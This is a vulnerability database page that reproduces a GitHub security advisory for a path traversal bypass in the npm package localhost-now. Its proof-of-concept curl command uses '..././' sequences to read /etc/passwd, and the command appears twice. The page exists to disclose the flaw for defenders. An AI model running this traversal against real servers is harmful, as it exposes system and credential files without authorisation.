ghsa-73cw-jxmm-qpgh
Vulnerability from github
Published
2019-06-11 16:40
Modified
2020-08-31 18:31
VLAI Severity ?
Summary
Path Traversal in localhost-now
Details
All versions of localhost-now are vulnerable to path traversal. This vulnerability is a bypass to the path traversal fix introduced in version 1.0.2
Proof of concept:
$ curl -v --path-as-is "http://IP:5432/..././..././..././..././..././..././..././..././..././..././etc/passwd"
Recommendation
No fix is currently available for this vulnerability. It is our recommendation to not install or use this module until a fix is available.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "localhost-now"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2019-06-11T16:40:34Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "All versions of `localhost-now` are vulnerable to path traversal. This vulnerability is a bypass to the path traversal fix introduced in version 1.0.2\n\nProof of concept:\n\n```\n$ curl -v --path-as-is \"http://IP:5432/..././..././..././..././..././..././..././..././..././..././etc/passwd\" \n```\n\n\n## Recommendation\n\nNo fix is currently available for this vulnerability. It is our recommendation to not install or use this module until a fix is available.\n ",
"id": "GHSA-73cw-jxmm-qpgh",
"modified": "2020-08-31T18:31:31Z",
"published": "2019-06-11T16:40:48Z",
"references": [
{
"type": "WEB",
"url": "https://hackerone.com/reports/329837"
},
{
"type": "WEB",
"url": "https://github.com/DCKT/localhost-now/blob/master/lib/app.js#L17"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/655"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Path Traversal in localhost-now"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…
Loading…